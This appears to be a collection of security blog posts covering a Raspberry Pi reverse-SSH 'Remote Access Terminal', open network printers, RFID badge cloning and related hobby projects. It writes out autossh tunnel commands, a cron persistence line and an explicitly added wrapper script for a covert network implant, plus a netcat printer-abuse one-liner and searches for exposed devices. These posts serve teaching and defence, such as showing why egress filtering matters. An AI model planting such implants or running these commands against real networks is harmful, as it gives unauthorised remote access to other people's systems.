This morning I needed someone I was helping to send me some basic information about their MacBook, and realized that while I knew how to get that information it wasn't all in one easy-to-digest place, so I wrote sysinfo.sh to quickly gather it:

Here is the code:
https://gist.github.com/jgamblin/aa9a6eda5bce6797ab8394e0c47d3676
You will need to install iStats (gem install iStats) or comment out lines 9, 10, 12 and 13 of the gist to get the script to run properly.
Author: jgamblin
During a recent round of phone interviews while expanding my team at work, I was amazed at how many security professionals have a hard time clearly answering the following question:
“What’s the difference between a threat, a vulnerability and a risk?”
I think being able to do so is key to being a good security professional. I like to use this analogy to explain the three concepts clearly:
“Close the open door (vulnerability) to stop the bear (threat). If it got in we could get mauled (risk).”
Understanding and applying these three terms is the first step to doing great risk analysis, and risk analysis is the only way to effect change in most organizations. The next step is writing risk statements.
But remember that this exercise is as much for you as it is for whoever you are trying to secure. It wouldn't make much sense to spend your limited cycles protecting yourself against bears in Dallas, Texas, would it?
I have a couple of old Raspberry Pi 2s lying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level, if an attacker can plug one of these into your network and it can reach the internet, they own your network.
Here is a terrible diagram I put together using draw.io to explain:

To set this up you will need the following:
- Public SSH server (I like DigitalOcean for this.)
- RaspberryPi
- Raspbian
- AutoSSH
- Screen
- Understanding of SSH Keys
- Understanding of CRON
There are plenty of guides on setting this up so I won't spend time on that here. Once you have that complete and are on the Pi you can run the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean
Autossh uses ports 65500 and 65501 as its monitor channel, sending echo data out through the tunnel and back so it can notice a dead connection and restart ssh. The -R 2222:localhost:22 option makes the public server listen on its own port 2222 (on its loopback only, unless GatewayPorts is enabled there) and forward those connections back to the SSH port on the Pi.
Once that is done you can SSH into your public server and, from there, connect to the Pi through the tunnel (localhost here is the public server's own loopback, where port 2222 is bound; pi is the default Raspbian account):
ssh -p 2222 pi@localhost

Congratulations, you now have a host you can control from the internet on a private network (that you totally have permission to be plugged into, right?).

While this works, if the Pi has any problems the tunnel will be gone, so we will use a cron job to make sure it is always up. The following crontab entry does not actually check whether the tunnel is up; it launches a fresh detached screen session running autossh every minute. Note the user field (pi) after the schedule: this is the /etc/crontab and /etc/cron.d format, not the format for the pi user's own crontab -e, which has no user field.
* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.
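Here is a cron-friendly wrapper that only starts autossh when no live tunnel is recorded in a pidfile, so a once-a-minute cron entry stops stacking new screen sessions. This is an added example, not from the original post or the gist. It keeps the relay alias (root@digitalocean), key path and ports from above; the pidfile location (/tmp/reverse-ssh-tunnel.pid) and the ExitOnForwardFailure and AUTOSSH_GATETIME settings are my additions (both are real ssh/autossh options, they just were not in the original command).

```shell
#!/bin/sh
# reverse-tunnel.sh - added example, not part of the original post.
# Run from cron every minute as the pi user:
#   * * * * * pi /home/pi/reverse-tunnel.sh run      (in /etc/cron.d/reverse-tunnel)
# Only starts autossh when the pidfile does not name a live process.

PIDFILE="${PIDFILE:-/tmp/reverse-ssh-tunnel.pid}"   # assumed location
RELAY="${RELAY:-root@digitalocean}"                  # ~/.ssh/config alias, as in the post
KEY="${KEY:-/home/pi/.ssh/id_rsa}"                   # key path, as in the post
MONITOR_PORT=65500   # autossh also uses MONITOR_PORT+1 (65501)
REMOTE_PORT=2222     # port the relay listens on and forwards to the Pi's sshd

# tunnel_is_running: return 0 if PIDFILE names a live process.
# A missing file, an empty file, non-numeric content, or a pid that is no
# longer alive (a stale file left by a crash or reboot) all return 1.
tunnel_is_running() {
    [ -r "$PIDFILE" ] || return 1
    pid=$(head -n 1 "$PIDFILE" 2>/dev/null)
    case "$pid" in
        ''|*[!0-9]*) return 1 ;;   # empty or not purely digits
    esac
    kill -0 "$pid" 2>/dev/null
}

# start_tunnel: launch autossh in the background and record its pid.
# ExitOnForwardFailure makes ssh exit if the relay cannot bind REMOTE_PORT
# (for example a half-dead earlier session still holds it), so autossh
# reconnects instead of sitting on a session that carries no tunnel.
# AUTOSSH_GATETIME=0 stops autossh giving up when the very first attempt
# fails quickly, which is what happens when the Pi boots before the network
# is up. -N asks ssh for forwarding only, no remote shell.
start_tunnel() {
    rm -f "$PIDFILE"
    AUTOSSH_GATETIME=0 nohup autossh -M "$MONITOR_PORT" \
        -i "$KEY" \
        -o "ServerAliveInterval 20" \
        -o "ServerAliveCountMax 3" \
        -o "ExitOnForwardFailure yes" \
        -o "StrictHostKeyChecking yes" \
        -N -R "$REMOTE_PORT:localhost:22" "$RELAY" >/dev/null 2>&1 &
    echo "$!" > "$PIDFILE"
}

# ensure_tunnel: the cron entry point. Starts the tunnel only if needed.
ensure_tunnel() {
    if tunnel_is_running; then
        echo "tunnel already running (pid $(head -n 1 "$PIDFILE"))"
    else
        start_tunnel
        echo "started tunnel (pid $(head -n 1 "$PIDFILE"))"
    fi
}

# Only act when invoked as "reverse-tunnel.sh run", so the functions can be
# sourced or tested without launching ssh.
case "${1:-}" in
    run) ensure_tunnel ;;
esac
```

The pidfile check is deliberately simple: kill -0 only asks whether the pid exists, so after a reboot the file is stale and the tunnel gets restarted, which is the behaviour you want. The relay's copy of the private key is never needed; the Pi authenticates outbound with its own key, which is exactly why plain egress filtering (blocking outbound 22 to arbitrary hosts) is what stops this device from phoning home.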
I have been playing with GL.inet hardware lately and stumbled upon a project called NetAidKit, built on the $25 6416 platform, that offers a purpose-built Tor and VPN router.
After building the images using the instructions on their github page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business:

The Tor feature worked flawlessly:


The VPN still needs a lot of work: it expects certificate-based authentication, and every VPN I use still uses username and password authentication, so I was disappointed I didn't get to try it out.

Overall this is an amazing project with a great idea and lots of potential. I will be carrying a NetAidKit with me from now on, even if it is just to use with Tor.
My friend Steve Lord recently introduced me to the ultra-portable GL-inet routers. I picked up the $25 GL-AR150 to hack around on.
One of the first things I noticed while reading through their blog was that the hardware is the same as the WiFi Pineapple Nano, and someone had already ported the firmware to work on the AR150.
Updating the firmware is as simple as logging in and uploading this file. Once that is done, log back in and set it up.
Here are a couple of good guides on how to configure it:
The WiFi Pineapple Mark V – Introduction and Setup
WiFi Nano Setup
I plan on using this to do some continual AP and client monitoring around my house.
I have a few more projects on this platform that I will be posting about soon.
After spending last night working on a reverse DNS function for Google Sheets I couldn't leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io API.

It provides a lot more information than the reverse lookup function, and all you should have to do is copy your API key into C2 and start filling in IP addresses in column A. You can download a copy here.
Often in my job I am given spreadsheets of IP addresses that look like this:

One of the first things I always want to do is find out whether they have an FQDN. Sadly Google keeps forgetting to build a reverse DNS function into Sheets, so with the help of the HackerTarget API I hacked this together today:

The configuration is pretty easy (although this took me way longer than I want to admit.)
The cells are setup like this:
A2: IP Address
B2: ="http://api.hackertarget.com/reversedns/?q="&(A2)
C2: =IMPORTDATA(B2)
D2: =SPLIT(C2," ")
E2: FQDN (Finally)
Here is a link to the sheet so you can copy it and play with it. Hopefully this can help someone else out in the future as I know I have spent way too much time manually looking this information up.
Here is a gif of it in action:

This weekend the infamous hacker and troll Weev decided it would be hilarious to print fascist flyers on open printers around the United States using this “top secret APT” string:
cat payload.ps | netcat -q 0 <printer-ip> 9100
Port 9100 is the raw JetDirect printing port: anything written to it is treated as a print job, with no authentication at all. A lot of colleges and universities seem to have a problem with this. While I strongly disagree with the content Weev printed, I was interested in how many printers were “vulnerable” to this attack.
Using Censys.io (my favorite internet host search tool) to search for “location.country_code:US AND telnet AND HP Jetdirect”, I found 15,237 printers in the US that are “weev-able”.

While 15,237 printers on the public internet is ridiculous, searching for “location.country_code:US AND "HP JetDirect Password is not set"” shows 5,683 printers that have no password set at all.
My friend Scott pointed out the towels in most hotels now have RFID tags to help with inventory control:

I also knew that my RSA Conference badge would have an RFID tag in it so it could be scanned on the expo floor:

Since I never leave home without my Proxmark3 in my assault pack it was time to get to work:

What I found out next is something I wasn’t expecting that made this whole thing a lot more interesting.
Using the Proxmark I was able to tell that the hotel towel and my RSA badge use the same MIFARE Ultralight C tags:

So from there I was able to clone my RSA pass to my hotel towel, since the towel had a rewritable tag.
I will be demoing the walkthrough of this at First in Amsterdam in April.
So now I am at the point where you can scan my towel and get the same UID, which means I can have people scan my towel and get the same information they would have gotten off my badge.
Which allows me to quote one of my favorite lines from the Hitchhikers Guide.

*No hotel towels have been permanently harmed; they will be returned to my room with the correct UID rewritten to them.
The FBI has recently obtained a court order requiring Apple to help it unlock the iPhone of one of the San Bernardino shooters (Here is Apple’s response.).
The reason Apple's help is needed is that the phone has “Erase All Data After 10 Failed Passcode Attempts” turned on. Without that feature the government could have just built this robot to brute-force the passcode and this wouldn't have been an issue:

What this means for the general public is that we now know the FBI cannot bypass this setting, so if you care about your privacy you should enable it.
Doing so is fairly easy:
Settings > Touch ID & Passcode > Erase Data > Enable.

While this is a “dangerous” setting, getting the phone to actually erase the data is pretty hard. You have to wait through the following timeouts, so your toddler (or a malicious jerk) will not accidentally erase your phone:

You get used to seeing this screen a lot:

After the 10th attempt this happens:

